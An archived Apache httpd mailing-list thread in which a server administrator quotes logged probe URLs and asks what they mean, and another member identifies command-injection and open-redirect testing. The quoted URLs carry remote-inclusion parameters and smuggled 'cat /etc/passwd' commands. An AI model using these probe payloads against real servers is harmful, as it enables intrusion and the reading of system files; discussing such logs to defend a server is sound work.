httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Knute Johnson <apa...@knutejohnson.com>
Subject Re: [users@httpd] Possible exploit?
Date Wed, 12 Feb 2014 16:28:33 GMT
On 2/12/2014 08:04, rahul bhola wrote:
> in first and last casehe was checking if it is possible to pass shell
> commands throught command or cmd parameter.not sure on second one but it
> looks like he was testing for unsanitized url redirection vul.
>
>
> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <apache@knutejohnson.com
> <mailto:apache@knutejohnson.com>> wrote:
>
>     I found the following in my log this morning.  Does anybody know
>     what it really means?  Thanks.
>
>       A total of 3 possible successful probes were detected (the
>     following URLs
>       contain strings that match one or more of a listing of strings that
>       indicate a possible exploit):
>
>
>     /user.php?caselist[bad_file.__txt][path]=http://www.google.__com/humans.txt?&command=cat%__20/etc/passwd
>     <http://www.google.com/humans.txt?&command=cat%20/etc/passwd> HTTP
>     Response 302
>
>     /sid=__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=http://www.google.com/__humans.txt
>     <http://www.google.com/humans.txt>? HTTP Response 302
>
>     /gepi/gestion/savebackup.php?__filename=http://www.google.__com/humans.txt?&cmd=cat/etc/__passwd
>     <http://www.google.com/humans.txt?&cmd=cat/etc/passwd> HTTP Response 302
>
>
>     --
>
>     Knute Johnson
>
>     ------------------------------__------------------------------__---------
>     To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org
>     <mailto:users-unsubscribe@httpd.apache.org>
>     For additional commands, e-mail: users-help@httpd.apache.org
>     <mailto:users-help@httpd.apache.org>
>
>
>
>
> --
> Rahul Bhola
> B.E.
> computers
> Core Member
> Department of backstage
> Bits Pilani KK Birla Goa Campus

So you think he was trying to get the content of my passwd file?  So 
what would that get him?

Is it possible to do this myself to see what he could have gotten?

Thanks,

-- 

Knute Johnson

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message